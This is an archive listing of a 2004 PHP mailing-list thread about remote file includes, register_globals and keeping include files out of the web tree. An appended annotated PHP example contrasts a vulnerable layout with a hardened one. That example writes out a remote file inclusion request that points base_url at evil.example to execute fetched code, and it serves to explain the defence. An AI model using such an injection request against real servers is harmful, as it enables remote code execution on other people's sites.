Re: [PHP] allow_url_fopen ini directive not enough

2004-12-13 Thread Jason Wong
On Tuesday 14 December 2004 03:11, Richard Lynch wrote: > If they can't run with register_globals OFF, they don't get installed. Even if they are advertised to run with register_globals disabled, I hope you check that they don't cheat and do something cheesy like extract($_REQUEST). ;-) -- Ja

Re: [PHP] allow_url_fopen ini directive not enough

2004-12-13 Thread Richard Lynch
KJ wrote: > OK, I don't think you've read my posts in much detail at all. It looks as > though you have skimmed over them and got a pre-determined idea of my > issue in your head. > > Not once have I mentioned anything about "customers" in my posts. I'm > not a web host. I'm not talking about people

Re: [PHP] allow_url_fopen ini directive not enough

2004-12-13 Thread Richard Lynch
KJ wrote: >> So, not only do you have register_globals "on" which is a Bad Idea, >> you've >> got PHP files in your web tree that they can surf to, bypass your >> configuration setting of $base_url, and execute code that the Programmer >> never ever ever intended to be executed out of sequence (IE,

Re: [PHP] allow_url_fopen ini directive not enough

2004-12-13 Thread Richard Lynch
KJ wrote: > Ah OK. So the only includes should be out of the web tree, or on a > remote site? > > Nice one. I hope you're not being sarcastic, because this statement is actually 100% true. Your web-sites should have clearly-defined 'entry points' which are pages that you actually expect peop

Re: [PHP] allow_url_fopen ini directive not enough

2004-12-13 Thread KJ
Ah OK. So the only includes should be out of the web tree, or on a remote site? Nice one. Mike Ford wrote: To view the terms under which this email is distributed, please go to http://disclaimer.leedsmet.ac.uk/email.htm On 10 December 2004 22:07, Richard Lynch wrote: This is a MUCH BIGGER

RE: [PHP] allow_url_fopen ini directive not enough

2004-12-13 Thread Ford, Mike
To view the terms under which this email is distributed, please go to http://disclaimer.leedsmet.ac.uk/email.htm On 10 December 2004 22:07, Richard Lynch wrote: > This is a MUCH BIGGER PROBLEM than remote include working or not. > > You've *GOT* to get those files *OUT* of the web-tree. > >

Re: [PHP] allow_url_fopen ini directive not enough

2004-12-11 Thread KJ
Greg Donald wrote: On Fri, 10 Dec 2004 22:00:43 +, KJ <[EMAIL PROTECTED]> wrote: 5. Joe Hacker has studied the script coz he's a tart that wants to piss people off and he has found a vulnerability. 6. Joe Hacker uses the vulnerability to change your account passwd. He then logs in as you and del

Re: [PHP] allow_url_fopen ini directive not enough

2004-12-10 Thread Greg Donald
On Fri, 10 Dec 2004 22:00:43 +, KJ <[EMAIL PROTECTED]> wrote: > Let me try to paint another simple scenario: > > 1. You have a shared hosting account with example.com hosted on it. > 2. You want a guestbook setup on it, and you've found one that you like. > 3. You install "phpMyFantasticGuestbo

Re: [PHP] allow_url_fopen ini directive not enough

2004-12-10 Thread KJ
Richard Lynch wrote: Now in each instance register globals was on and all that was needed to You should turn register_globals off, first of all. True, ideally register globals should be off. Secondly, something is very very very wrong in your analysis. No it isn't. If this line of code gets execute

Re: [PHP] allow_url_fopen ini directive not enough

2004-12-10 Thread Richard Lynch
KJ wrote: > OK, apologies on my part, I did not correctly explain the problem which > can and has arisen from remote includes. > > I'll try to explain the problem that I have come across twice in the > last couple of years both with popular software packages that I > downloaded like thousands of ot

Re: [PHP] allow_url_fopen ini directive not enough

2004-12-10 Thread KJ
OK, I don't think you've read my posts in much detail at all. It looks as though you have skimmed over them and got a pre-determined idea of my issue in your head. Not once have I mentioned anything about "customers" in my posts. I'm not a web host. I'm not talking about people who have access t

Re: [PHP] allow_url_fopen ini directive not enough

2004-12-10 Thread Richard Lynch
KJ wrote: >> >> Basically this particular case boils down to: "files that are included >> and >> should not be called directly" should not be allowed to be called >> directly. >> >> You can do this at the application level whereby each included file >> checks >> whether it was called directly and

Re: [PHP] allow_url_fopen ini directive not enough

2004-12-10 Thread KJ
Basically this particular case boils down to: "files that are included and should not be called directly" should not be allowed to be called directly. You can do this at the application level whereby each included file checks whether it was called directly and refuses to run when that is so. O

Re: [PHP] allow_url_fopen ini directive not enough

2004-12-09 Thread Jason Wong
On Friday 10 December 2004 06:05, KJ wrote: > The vulnerability occurred where both applications had a variable setting > a base directory of the source code, which was used when including files > throughout the application, i.e.: > > $base_url = '/home/example.com/www'; > include_once ($base_url.'

Re: [PHP] allow_url_fopen ini directive not enough

2004-12-09 Thread KJ
OK, apologies on my part, I did not correctly explain the problem which can and has arisen from remote includes. I'll try to explain the problem that I have come across twice in the last couple of years both with popular software packages that I downloaded like thousands of others and both with
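The failure KJ describes (a `$base_url` variable used for includes, reachable through `register_globals` when an included file is requested directly) and the application-level guard discussed earlier in the thread, as an added example; this is not code from anyone in this thread or from the packages KJ mentions. The file names index.php, lib/helpers.php and lib/db.php, the constant IN_APP and the host evil.example are assumptions made for illustration.

```php
<?php
// Added example, not code from this thread. Paths, the IN_APP constant and the
// host evil.example are assumed for illustration.
//
// ---- 1. The vulnerable layout described in the thread -------------------------
// /home/example.com/www/config.php      sets:  $base_url = '/home/example.com/www';
// /home/example.com/www/inc/helpers.php (inside the web tree, so directly requestable)
//
//   <?php
//   include_once($base_url . '/inc/db.php');   // relies on config.php having run first
//
// A request for /inc/helpers.php?base_url=http://evil.example/x? skips config.php,
// so with register_globals=On $base_url is taken from the query string and the
// include fetches http://evil.example/x?/inc/db.php and executes it as PHP
// (as long as URL includes are permitted by allow_url_fopen). Jason Wong's point
// applies too: a script that does extract($_REQUEST) recreates the same hole with
// register_globals=Off.
//
// ---- 2. The hardened layout -----------------------------------------------------
// /home/example.com/www/index.php       (the ONLY PHP file under the web root)
//
//   <?php
//   define('IN_APP', true);                 // proves the entry point ran first; a
//                                           // constant cannot be injected, a variable
//                                           // like $in_app could be with register_globals
//   require_once dirname(__DIR__) . '/lib/helpers.php';   // /home/example.com/lib is not served
//
// /home/example.com/lib/helpers.php     (outside the web tree; this is the real code below)

if (!defined('IN_APP')) {
    // Belt and braces: even if lib/ is ever exposed, a direct request gets nothing.
    header('HTTP/1.0 403 Forbidden');
    exit('Direct access not permitted');
}

// Derive the include base from this file's own location, never from a variable a
// request could pre-populate. __DIR__ can only ever be a local filesystem path.
$base_dir = __DIR__;

// Final check before including: refuse anything that does not resolve to a plain
// file underneath $base_dir (no URLs, no ../ escapes, no stream wrappers).
function safe_require($base_dir, $name)
{
    $path = realpath($base_dir . '/' . $name);
    if ($path === false || strpos($path, $base_dir . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("refusing to include '$name'");
    }
    require_once $path;
}

safe_require($base_dir, 'db.php');
```

The guard uses `define()` rather than a flag variable on purpose: `register_globals` (or an `extract($_REQUEST)`) can pre-populate any variable, but cannot pre-define a constant. On the configuration side, `allow_url_fopen = Off` is the only knob available to the thread's participants; PHP 5.2 later added the separate `allow_url_include` directive (default Off) that Kelvin Jones's original post asks for, and `register_globals` was removed in PHP 5.4.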

Re: [PHP] allow_url_fopen ini directive not enough

2004-12-09 Thread Richard Lynch
Kelvin Jones wrote: > I would like to see a new directive to go alongside "allow_url_fopen" to > allow people to turn on or off the ability to include/require a remote > file. > > The ability to include and execute a file as php from a remote host > leaves many applications open to cross-site-scrip